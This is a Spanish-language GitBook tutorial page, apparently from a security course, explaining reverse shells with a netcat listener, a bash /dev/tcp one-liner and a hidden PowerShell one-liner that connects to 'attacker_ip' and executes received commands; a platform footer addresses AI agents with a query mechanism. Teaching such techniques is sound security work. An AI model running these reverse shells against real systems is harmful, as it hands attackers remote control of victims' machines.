# ¿Reverse Shell?

Una reverse shell es un tipo de shell donde el flujo de comunicación se invierte. En lugar de que el atacante se conecte directamente a la máquina objetivo, la máquina objetivo establece una conexión de vuelta al atacante. Esto puede ayudar a evadir firewalls y otras medidas de seguridad que bloquean conexiones entrantes.

<https://www.revshells.com/>

## <mark style="color:green;">**Funcionamiento de una Reverse Shell**</mark>

1. <mark style="color:green;">**Atacante**</mark><mark style="color:green;">:</mark> Inicia un listener en su máquina para esperar conexiones entrantes.
2. <mark style="color:green;">**Víctima**</mark><mark style="color:green;">:</mark> Ejecuta un payload que abre una conexión hacia la máquina del atacante.
3. <mark style="color:green;">**Control Remoto**</mark><mark style="color:green;">:</mark> Una vez establecida la conexión, el atacante puede enviar comandos y controlar el sistema de la víctima.

## <mark style="color:green;">**Ejemplo de Reverse Shell en Bash (Linux):**</mark>

**Atacante**:

```bash
nc -lvnp 4444
```

**Víctima**:

```bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
```

## <mark style="color:green;">**Ejemplo de Reverse Shell en PowerShell (Windows):**</mark>

**Atacante**:

```bash
nc -lvnp 4444
```

**Víctima**:

{% code overflow="wrap" %}

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/cppj/shell/reverse-shell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.